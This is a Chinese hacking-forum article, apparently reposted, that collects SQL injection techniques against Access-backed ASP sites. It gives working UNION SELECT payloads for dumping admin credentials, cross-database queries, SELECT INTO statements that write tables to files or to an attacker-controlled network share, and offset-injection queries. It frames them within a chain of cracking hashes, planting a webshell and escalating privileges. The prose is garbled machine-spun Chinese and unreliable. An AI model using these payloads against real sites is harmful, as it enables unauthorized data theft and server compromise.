关注我们
QRcode 邮件联系 QRcode
主页 » 信息安全 » 正文

Access数据库注入点高级运用总结

 feng  1,193 ℃  0条点评

信赖Access注入点是人人看到最多的了,一样平常敷衍 办法就是:

猜表猜段猜内容---MD5---去靠山---看上传,备份,设置信息等等---上WEBSEHLL---提权.这是最常见和最普及 的ACCESS注入点应用行动 了.不外这里存在太多的不定因素,乐成 率非常低.任何一步失败,都也许让你不知怎样是好..

但是ACCESS就只有这么点能耐了么?答案是否定 的.下面我们来看看,都有哪些地方 是可以改善和进一步发挥 的.PS,我信赖行动 确定不止这些,只是创造的人都本身用着不公然 偷着乐罢了..

--------------------------------------------------------------

union查询法

起首要说的就是查询办法,一样平常的查询办法就是

and 1=(select count(*) from admin where left(id,1)='1')

如许起头确定 了...就算你应用种种千般的器材,也是一个个字的去猜去确定 对不对,不对再换一个.如许的毛病显而易见,慢. 出格是在揣摩颠末 32位MD5加密过的段的时间 ...根本 上你可以去泡壶茶再喝一杯.

以是这个时间 ,union select横空出现.别认为只能在PHP里用哦...

譬如你有一个ACCESS点:

http://www.2cto.com/xiaoyang.asp?coder=1

知道存在admin表(你固然 可以拿个器材先快速猜出表和字段来),

然后我们直接来:

http://www.2cto.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(假如有限定查询条件)]

这里从1起头加到回显正常为止.然后变更 URL里相应在页面出现的1~X为password,username之类的对象,就可以直接暴内容了.多利便 ,多快捷.茶可以先放放,凉一些再来喝了.

---------------------------------------------------------------

Access跨库查询

偶然间某个网站做事器上有两个以上体系 ,你创造此中一个有ACCESS注入点,但是靠山没法提权,其它一个体系 没有注入点,但是靠山却有你必要 的功能.那么这个时间 ,跨库来了.固然 ,你还可以用来MDB溢出,渗出的过程等等.他的作用每每是意想不到的.

跨库的查询语句:

子查询:

and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0

union查询:

union select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1

跨库的作用固然 不但这些了,大伙连续 发挥 吧..这里供给 一篇参考过的文章毗连 :

http://www.2cto.com/Article/200507/5869.html

---------------------------------------------------------------

Access注入,导出txt,htm,html

子查询语句:

SELECT * into [test.txt] in 'd:\web\' 'text;' from admin

如许就把admin表的内容以test范例存进了d:\web内里 .

UNION查询:

union select * into [admin.txt] in 'c:\' 'test;' from admin

并且这里也可以生涯到内地来:

SELECT * into [test.txt] in '\\yourip\share' 'text;' from admin

不外 ,很多 人包孕我本身测试,本机数据库来操纵是没题目的,但是一旦在注入点上,子查询会回显没有权限,union会回显举措 查询不能作为行的滥觞.可以说照样个困难 ...缘故起因 大概是UNION只适用查询结合,UNION后头不能跟举措 .和这个内容干系 的,本论坛已有一帖:

http://www.2cto.com/viewthread.php?tid=3016&extra=page%3D7

由于网上有很多和这干系 的原料 ,以是我照样把他引进来了.假如一旦这行动 运用 乐成 的话,理论上我们只要知道表名,不必要 知道段名,就可以看到该表全部内容了.可能我们可以建.php.tianyang asp.asp之类的文件可能目次来导进文件~照样会很壮大的.

---------------------------------------------------------------

Access偏移注入

union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
union select 1,2,3,4,5,6,7,8,9,10,11,12,13,a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
union select 1,2,3,4,5,6,7,8,a.id,b.id,c.id,d.id,* from (((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id) inner join admin as d on a.id=d.id)

摘自:http://www.2cto.com/Article/201109/103743.html

本文标签:
巧进非诚勿扰—飘柔“爱转角”网站后台
[转载]域 渗透实录
我是如何打造一款自动化SQL注入工具的我是如何打造一款自动化SQL注入工具的分析勒索软件Cerber的攻击方法分析勒索软件Cerber的攻击方法​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)​分析Cknife,一个类似China Chopper的webshell管理工具(第二部分)某个商业定向攻击活动分析某个商业定向攻击活动分析

已有0条评论,欢迎点评!

smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley smiley

国际惯例, 沙发拿下 . . .


注册帐号  |  忘记密码